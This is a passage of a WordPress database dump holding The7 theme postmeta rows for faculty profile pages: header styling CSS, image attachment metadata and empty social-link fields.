(25741,3601,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(25742,3577,'_dt_fancy_header_layout_heading',''),
(25743,3577,'_dt_fancy_header_title_aligment','center'),
(25744,3577,'_dt_fancy_header_height','300'),
(25745,3577,'_dt_fancy_header_padding-top','0px'),
(25746,3577,'_dt_fancy_header_padding-bottom','0px'),
(25747,3577,'_dt_fancy_header_breadcrumbs_heading',''),
(25748,3577,'_dt_fancy_header_breadcrumbs','disabled'),
(25749,3577,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(25750,3577,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(25751,3577,'_dt_fancy_header_title_heading',''),
(25752,3577,'_dt_fancy_header_title_mode','custom'),
(25753,3577,'_dt_fancy_header_title','Prof. Dr. Moustafa Baraka'),
(25754,3577,'_dt_fancy_header_title_font_size','30'),
(25755,3577,'_dt_fancy_header_title_line_height','36'),
(25756,3577,'_dt_fancy_header_text_transform','none'),
(25757,3577,'_dt_fancy_header_title_color_mode','color'),
(25758,3577,'_dt_fancy_header_title_color','#ffffff'),
(25759,3577,'_dt_fancy_header_subtitle_heading',''),
(25760,3577,'_dt_fancy_header_subtitle',''),
(25761,3577,'_dt_fancy_header_subtitle_font_size','18'),
(25762,3577,'_dt_fancy_header_subtitle_line_height','26'),
(25763,3577,'_dt_fancy_header_subtitle_text_transform','none'),
(25764,3577,'_dt_fancy_header_subtitle_color_mode','color'),
(25765,3577,'_dt_fancy_header_subtitle_color','#ffffff'),
(25766,3577,'_dt_fancy_header_bg_heading',''),
(25767,3577,'_dt_fancy_header_bg_color','#222222'),
(25768,3577,'_dt_fancy_header_bg_image_origin','custom'),
(25769,3577,'_dt_fancy_header_bg_image','a:0:{}'),
(25770,3577,'_dt_fancy_header_bg_repeat','no-repeat'),
(25771,3577,'_dt_fancy_header_bg_position_x','center'),
(25772,3577,'_dt_fancy_header_bg_position_y','center'),
(25773,3577,'_dt_fancy_header_bg_fullscreen','1'),
(25774,3577,'_dt_fancy_header_bg_overlay','0'),
(25775,3577,'_dt_fancy_header_overlay_color','#000'),
(25776,3577,'_dt_fancy_header_bg_overlay_opacity','50'),
(25777,3577,'_dt_fancy_header_scroll_effect','default'),
(25778,3577,'_dt_fancy_header_bg_parallax','0.5'),
(25779,3577,'_dt_fancy_header_responsiveness_heading',''),
(25780,3577,'_dt_fancy_header_responsiveness','disabled'),
(25781,3577,'_dt_fancy_header_responsiveness_switch','778px'),
(25782,3577,'_dt_fancy_header_responsive_height','70'),
(25783,3577,'_dt_fancy_header_responsive_font_size','30'),
(25784,3577,'_dt_fancy_header_responsive_title_line_height','38'),
(25785,3577,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(25786,3577,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(25787,3577,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(25788,3577,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(25791,3606,'_edit_lock','1674359481:1'),
(25792,3607,'_wp_attached_file','2023/01/Mengchi_Ai.jpg'),
(25793,3607,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:22:\"2023/01/Mengchi_Ai.jpg\";s:8:\"filesize\";i:190877;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"Mengchi_Ai-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10335;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"Mengchi_Ai-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4277;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:22:\"Mengchi_Ai-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21147;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 600D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1521559032\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(25794,3608,'_wp_attached_file','2023/01/Mengchi_Ai-1.jpg'),
(25795,3608,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:24:\"2023/01/Mengchi_Ai-1.jpg\";s:8:\"filesize\";i:190877;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"Mengchi_Ai-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10335;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"Mengchi_Ai-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4277;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:24:\"Mengchi_Ai-1-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21147;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 600D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1521559032\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(25796,3606,'_thumbnail_id','3607'),
(25797,3606,'_edit_last','1'),
(25798,3606,'_dt_sidebar_position','disabled'),
(25799,3606,'_dt_sidebar_widgetarea_id','sidebar_1'),
(25800,3606,'_dt_sidebar_hide_on_mobile','0'),
(25801,3606,'_dt_footer_show','1'),
(25802,3606,'_dt_footer_widgetarea_id','sidebar_2'),
(25803,3606,'_dt_footer_hide_on_mobile','0'),
(25804,3606,'_dt_header_title','fancy'),
(25805,3606,'_dt_header_background','normal'),
(25806,3606,'_dt_header_background_below_slideshow','disabled'),
(25807,3606,'_dt_header_transparent_bg_color_scheme','light'),
(25808,3606,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(25809,3606,'_dt_header_transparent_top_bar_bg_opacity','25'),
(25810,3606,'_dt_header_transparent_bg_color','#000000'),
(25811,3606,'_dt_header_transparent_bg_opacity','50'),
(25812,3606,'_dt_header_disabled_background','normal'),
(25813,3606,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(25814,3606,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(25815,3606,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(25816,3606,'_dt_header_disabled_transparent_bg_color','#000000'),
(25817,3606,'_dt_header_disabled_transparent_bg_opacity','50'),
(25818,3606,'_dt_page_overrides_top_margin',''),
(25819,3606,'_dt_page_overrides_right_margin',''),
(25820,3606,'_dt_page_overrides_bottom_margin',''),
(25821,3606,'_dt_page_overrides_left_margin',''),
(25822,3606,'_dt_mobile_page_padding_top',''),
(25823,3606,'_dt_mobile_page_padding_right',''),
(25824,3606,'_dt_mobile_page_padding_bottom',''),
(25825,3606,'_dt_mobile_page_padding_left',''),
(25826,3606,'_dt_fancy_header_layout_heading',''),
(25827,3606,'_dt_fancy_header_title_aligment','center'),
(25828,3606,'_dt_fancy_header_height','300'),
(25829,3606,'_dt_fancy_header_padding-top','0px'),
(25830,3606,'_dt_fancy_header_padding-bottom','0px'),
(25831,3606,'_dt_fancy_header_breadcrumbs_heading',''),
(25832,3606,'_dt_fancy_header_breadcrumbs','disabled'),
(25833,3606,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(25834,3606,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(25835,3606,'_dt_fancy_header_title_heading',''),
(25836,3606,'_dt_fancy_header_title_mode','custom'),
(25837,3606,'_dt_fancy_header_title','DR Mengchi Ai '),
(25838,3606,'_dt_fancy_header_title_font_size','30'),
(25839,3606,'_dt_fancy_header_title_line_height','36'),
(25840,3606,'_dt_fancy_header_text_transform','none'),
(25841,3606,'_dt_fancy_header_title_color_mode','color'),
(25842,3606,'_dt_fancy_header_title_color','#ffffff'),
(25843,3606,'_dt_fancy_header_subtitle_heading',''),
(25844,3606,'_dt_fancy_header_subtitle',''),
(25845,3606,'_dt_fancy_header_subtitle_font_size','18'),
(25846,3606,'_dt_fancy_header_subtitle_line_height','26'),
(25847,3606,'_dt_fancy_header_subtitle_text_transform','none'),
(25848,3606,'_dt_fancy_header_subtitle_color_mode','color'),
(25849,3606,'_dt_fancy_header_subtitle_color','#ffffff'),
(25850,3606,'_dt_fancy_header_bg_heading',''),
(25851,3606,'_dt_fancy_header_bg_color','#222222'),
(25852,3606,'_dt_fancy_header_bg_image_origin','custom'),
(25853,3606,'_dt_fancy_header_bg_image','a:0:{}'),
(25854,3606,'_dt_fancy_header_bg_repeat','no-repeat'),
(25855,3606,'_dt_fancy_header_bg_position_x','center'),
(25856,3606,'_dt_fancy_header_bg_position_y','center'),
(25857,3606,'_dt_fancy_header_bg_fullscreen','1'),
(25858,3606,'_dt_fancy_header_bg_overlay','0'),
(25859,3606,'_dt_fancy_header_overlay_color','#000'),
(25860,3606,'_dt_fancy_header_bg_overlay_opacity','50'),
(25861,3606,'_dt_fancy_header_scroll_effect','default'),
(25862,3606,'_dt_fancy_header_bg_parallax','0.5'),
(25863,3606,'_dt_fancy_header_responsiveness_heading',''),
(25864,3606,'_dt_fancy_header_responsiveness','disabled'),
(25865,3606,'_dt_fancy_header_responsiveness_switch','778px'),
(25866,3606,'_dt_fancy_header_responsive_height','70'),
(25867,3606,'_dt_fancy_header_responsive_font_size','30'),
(25868,3606,'_dt_fancy_header_responsive_title_line_height','38'),
(25869,3606,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(25870,3606,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(25871,3606,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(25872,3606,'_dt_teammate_options_go_to_single','1'),
(25873,3606,'_dt_teammate_options_position',''),
(25874,3606,'_dt_teammate_options_website',''),
(25875,3606,'_dt_teammate_options_mail',''),
(25876,3606,'_dt_teammate_options_facebook',''),
(25877,3606,'_dt_teammate_options_twitter',''),
(25878,3606,'_dt_teammate_options_dribbble',''),
(25879,3606,'_dt_teammate_options_you-tube',''),
(25880,3606,'_dt_teammate_options_rss',''),
(25881,3606,'_dt_teammate_options_delicious',''),
(25882,3606,'_dt_teammate_options_flickr',''),
(25883,3606,'_dt_teammate_options_lastfm',''),
(25884,3606,'_dt_teammate_options_linkedin',''),
(25885,3606,'_dt_teammate_options_vimeo',''),
(25886,3606,'_dt_teammate_options_tumbler',''),
(25887,3606,'_dt_teammate_options_pinterest',''),
(25888,3606,'_dt_teammate_options_devian',''),
(25889,3606,'_dt_teammate_options_skype',''),
(25890,3606,'_dt_teammate_options_github',''),
(25891,3606,'_dt_teammate_options_instagram',''),
(25892,3606,'_dt_teammate_options_stumbleupon',''),
(25893,3606,'_dt_teammate_options_behance',''),
(25894,3606,'_dt_teammate_options_px-500',''),
(25895,3606,'_dt_teammate_options_tripedvisor',''),
(25896,3606,'_dt_teammate_options_vk',''),
(25897,3606,'_dt_teammate_options_foursquare',''),
(25898,3606,'_dt_teammate_options_xing',''),
(25899,3606,'_dt_teammate_options_weibo',''),
(25900,3606,'_dt_teammate_options_odnoklassniki',''),
(25901,3606,'_dt_teammate_options_research-gate',''),
(25902,3606,'_dt_teammate_options_yelp',''),
(25903,3606,'_dt_teammate_options_blogger',''),
(25904,3606,'_dt_teammate_options_soundcloud',''),
(25905,3606,'_dt_teammate_options_viber',''),
(25906,3606,'_dt_teammate_options_whatsapp',''),
(25907,3606,'_dt_teammate_options_reddit',''),
(25908,3606,'_dt_teammate_options_snapchat',''),
(25909,3606,'_dt_teammate_options_telegram',''),
(25910,3606,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(25911,3610,'_edit_lock','1674361541:1'),
(25912,3611,'_wp_attached_file','2023/01/loc14-e1674359736430.jpg'),
(25913,3611,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:180;s:6:\"height\";i:101;s:4:\"file\";s:32:\"2023/01/loc14-e1674359736430.jpg\";s:8:\"filesize\";i:37239;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"loc14-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4800;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:32:\"loc14-e1674359736430-150x101.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:101;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2164;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"loc14-768x431.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:431;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18454;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:17:\"loc14-500x281.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:281;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9579;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:17:\"loc14-800x449.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:449;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20046;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25914,3611,'_wp_attachment_backup_sizes','a:6:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:819;s:6:\"height\";i:460;s:4:\"file\";s:9:\"loc14.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:17:\"loc14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2265;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:17:\"loc14-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4800;}s:17:\"medium_large-orig\";a:5:{s:4:\"file\";s:17:\"loc14-768x431.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:431;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18454;}s:11:\"awb_sm-orig\";a:5:{s:4:\"file\";s:17:\"loc14-500x281.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:281;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9579;}s:11:\"awb_md-orig\";a:5:{s:4:\"file\";s:17:\"loc14-800x449.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:449;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20046;}}'),
(25915,3612,'_wp_attached_file','2023/01/loc14-1.jpg'),
(25916,3612,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:259;s:6:\"height\";i:338;s:4:\"file\";s:19:\"2023/01/loc14-1.jpg\";s:8:\"filesize\";i:25681;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"loc14-1-230x300.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10437;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"loc14-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4766;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(25917,3610,'_thumbnail_id','3612'),
(25918,3610,'_edit_last','1'),
(25919,3610,'_dt_sidebar_position','disabled'),
(25920,3610,'_dt_sidebar_widgetarea_id','sidebar_1'),
(25921,3610,'_dt_sidebar_hide_on_mobile','0'),
(25922,3610,'_dt_footer_show','1'),
(25923,3610,'_dt_footer_widgetarea_id','sidebar_2'),
(25924,3610,'_dt_footer_hide_on_mobile','0'),
(25925,3610,'_dt_header_title','fancy'),
(25926,3610,'_dt_header_background','normal'),
(25927,3610,'_dt_header_background_below_slideshow','disabled'),
(25928,3610,'_dt_header_transparent_bg_color_scheme','light'),
(25929,3610,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(25930,3610,'_dt_header_transparent_top_bar_bg_opacity','25'),
(25931,3610,'_dt_header_transparent_bg_color','#000000'),
(25932,3610,'_dt_header_transparent_bg_opacity','50'),
(25933,3610,'_dt_header_disabled_background','normal'),
(25934,3610,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(25935,3610,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(25936,3610,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(25937,3610,'_dt_header_disabled_transparent_bg_color','#000000'),
(25938,3610,'_dt_header_disabled_transparent_bg_opacity','50'),
(25939,3610,'_dt_page_overrides_top_margin',''),
(25940,3610,'_dt_page_overrides_right_margin',''),
(25941,3610,'_dt_page_overrides_bottom_margin',''),
(25942,3610,'_dt_page_overrides_left_margin',''),
(25943,3610,'_dt_mobile_page_padding_top',''),
(25944,3610,'_dt_mobile_page_padding_right',''),
(25945,3610,'_dt_mobile_page_padding_bottom',''),
(25946,3610,'_dt_mobile_page_padding_left',''),
(25947,3610,'_dt_fancy_header_layout_heading',''),
(25948,3610,'_dt_fancy_header_title_aligment','center'),
(25949,3610,'_dt_fancy_header_height','300'),
(25950,3610,'_dt_fancy_header_padding-top','0px'),
(25951,3610,'_dt_fancy_header_padding-bottom','0px'),
(25952,3610,'_dt_fancy_header_breadcrumbs_heading',''),
(25953,3610,'_dt_fancy_header_breadcrumbs','disabled'),
(25954,3610,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(25955,3610,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(25956,3610,'_dt_fancy_header_title_heading',''),
(25957,3610,'_dt_fancy_header_title_mode','custom'),
(25958,3610,'_dt_fancy_header_title','Assistant Prof. Mohamed Gomaa Mohamed'),
(25959,3610,'_dt_fancy_header_title_font_size','30'),
(25960,3610,'_dt_fancy_header_title_line_height','36'),
(25961,3610,'_dt_fancy_header_text_transform','none'),
(25962,3610,'_dt_fancy_header_title_color_mode','color'),
(25963,3610,'_dt_fancy_header_title_color','#ffffff'),
(25964,3610,'_dt_fancy_header_subtitle_heading',''),
(25965,3610,'_dt_fancy_header_subtitle',''),
(25966,3610,'_dt_fancy_header_subtitle_font_size','18'),
(25967,3610,'_dt_fancy_header_subtitle_line_height','26'),
(25968,3610,'_dt_fancy_header_subtitle_text_transform','none'),
(25969,3610,'_dt_fancy_header_subtitle_color_mode','color'),
(25970,3610,'_dt_fancy_header_subtitle_color','#ffffff'),
(25971,3610,'_dt_fancy_header_bg_heading',''),
(25972,3610,'_dt_fancy_header_bg_color','#222222'),
(25973,3610,'_dt_fancy_header_bg_image_origin','custom'),
(25974,3610,'_dt_fancy_header_bg_image','a:0:{}'),
(25975,3610,'_dt_fancy_header_bg_repeat','no-repeat'),
(25976,3610,'_dt_fancy_header_bg_position_x','center'),
(25977,3610,'_dt_fancy_header_bg_position_y','center'),
(25978,3610,'_dt_fancy_header_bg_fullscreen','1'),
(25979,3610,'_dt_fancy_header_bg_overlay','0'),
(25980,3610,'_dt_fancy_header_overlay_color','#000'),
(25981,3610,'_dt_fancy_header_bg_overlay_opacity','50'),
(25982,3610,'_dt_fancy_header_scroll_effect','default'),
(25983,3610,'_dt_fancy_header_bg_parallax','0.5'),
(25984,3610,'_dt_fancy_header_responsiveness_heading',''),
(25985,3610,'_dt_fancy_header_responsiveness','disabled'),
(25986,3610,'_dt_fancy_header_responsiveness_switch','778px'),
(25987,3610,'_dt_fancy_header_responsive_height','70'),
(25988,3610,'_dt_fancy_header_responsive_font_size','30'),
(25989,3610,'_dt_fancy_header_responsive_title_line_height','38'),
(25990,3610,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(25991,3610,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(25992,3610,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(25993,3610,'_dt_teammate_options_go_to_single','1'),
(25994,3610,'_dt_teammate_options_position',''),
(25995,3610,'_dt_teammate_options_website',''),
(25996,3610,'_dt_teammate_options_mail',''),
(25997,3610,'_dt_teammate_options_facebook',''),
(25998,3610,'_dt_teammate_options_twitter',''),
(25999,3610,'_dt_teammate_options_dribbble',''),
(26000,3610,'_dt_teammate_options_you-tube',''),
(26001,3610,'_dt_teammate_options_rss',''),
(26002,3610,'_dt_teammate_options_delicious',''),
(26003,3610,'_dt_teammate_options_flickr',''),
(26004,3610,'_dt_teammate_options_lastfm',''),
(26005,3610,'_dt_teammate_options_linkedin',''),
(26006,3610,'_dt_teammate_options_vimeo',''),
(26007,3610,'_dt_teammate_options_tumbler',''),
(26008,3610,'_dt_teammate_options_pinterest',''),
(26009,3610,'_dt_teammate_options_devian',''),
(26010,3610,'_dt_teammate_options_skype',''),
(26011,3610,'_dt_teammate_options_github',''),
(26012,3610,'_dt_teammate_options_instagram',''),
(26013,3610,'_dt_teammate_options_stumbleupon',''),
(26014,3610,'_dt_teammate_options_behance',''),
(26015,3610,'_dt_teammate_options_px-500',''),
(26016,3610,'_dt_teammate_options_tripedvisor',''),
(26017,3610,'_dt_teammate_options_vk',''),
(26018,3610,'_dt_teammate_options_foursquare',''),
(26019,3610,'_dt_teammate_options_xing',''),
(26020,3610,'_dt_teammate_options_weibo',''),
(26021,3610,'_dt_teammate_options_odnoklassniki',''),
(26022,3610,'_dt_teammate_options_research-gate',''),
(26023,3610,'_dt_teammate_options_yelp',''),
(26024,3610,'_dt_teammate_options_blogger',''),
(26025,3610,'_dt_teammate_options_soundcloud',''),
(26026,3610,'_dt_teammate_options_viber',''),
(26027,3610,'_dt_teammate_options_whatsapp',''),
(26028,3610,'_dt_teammate_options_reddit',''),
(26029,3610,'_dt_teammate_options_snapchat',''),
(26030,3610,'_dt_teammate_options_telegram',''),
